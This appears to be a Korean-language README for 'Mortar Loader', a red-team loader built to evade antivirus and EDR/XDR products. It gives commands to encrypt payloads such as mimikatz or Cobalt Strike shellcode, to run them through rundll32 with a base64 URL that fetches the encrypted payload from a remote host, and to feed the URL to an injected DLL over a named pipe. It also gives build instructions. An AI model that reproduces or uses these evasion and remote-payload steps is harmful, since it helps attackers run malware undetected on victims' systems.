
회피 기술로, 보안 제품(AV/EDR/XDR)의 탐지 및 차단을 무력화하고 우회합니다.
레드 팀 은폐 기술로 보안 제품의 탐지 및 차단을 우회하고 회피합니다. Mortar Loader는 메모리 스트림 내에서 PE/쉘코드의 암호화 및 복호화를 수행하고 여러 인젝션 기술을 활용하여 실행합니다.
Mortar는 최신 안티바이러스 제품과 고급 XDR 솔루션을 우회할 수 있으며, 다음 제품들에 대해 테스트 및 우회가 확인되었습니다:
최신 버전(v3)에는 다음과 같은 기능이 포함되어 출시되었습니다:
자세한 기술 설명은 다음 블로그 포스트를 참조하십시오: https://kpmg.com/nl/en/home/insights/2023/12/mortar-loader.html
암호화기는 C 쉘코드와 PE 바이너리를 암호화하여 .enc 파일로 출력합니다. x64 아키텍처이고 RAW 형식이 아닌 모든 페이로드(MSF/Cobalt/Havoc 등)를 사용할 수 있습니다.
root@kali>./encryptor -f mimikatz.exe -o bin.enc
root@kali>./encryptor -f shellcode.c -o bin.enc
최신 릴리스는 원격 페이로드 페칭과 결합된 여러 기술을 활용합니다. 더 많은 통찰력을 얻으려면 다음 블로그 포스트를 참조하는 것이 좋습니다.
간단한 사용 지침
# PE Forking
1. host your encrypted binary on remote host.
2. encode the final URL with base64.
3. rundll32.exe agressor.dll,viewlogs [BASE64 URL].
4. covert reload subroutine technique is enabled.
현재 Named Pipes와 결합된 얼리 버드 인젝션을 지원하여 최종 실행을 위한 변수를 수신합니다.
1. Mortar DLL을 원격 프로세스에 인젝션합니다(DLL 인젝션, 하이재킹, 사이드로딩).
2. Named Pipe에 연결하여 URL을 제공합니다.
echo {BASE64 URL} > \\.\pipe\moj_ML_ntsvcs
3. 유효한 값이 수신되면 페이로드가 실행됩니다.
이 프로젝트는 FPC(Free Pascal)로 코딩되었으며, 컴파일 절차는 Lazarus IDE를 다운로드하여 설치하면 간단합니다(https://www.lazarus-ide.org/index.php?page=downloads).
암호화기는 릴리스 섹션에서 다운로드하거나 Lazarus IDE로 쉽게 컴파일할 수 있습니다.
#Debian & Ubuntu
apt install fpc
apt install lazarus-ide
Mortar 또는 모든 공유 프로젝트의 개발은 개인 시간을 투자한 결과입니다.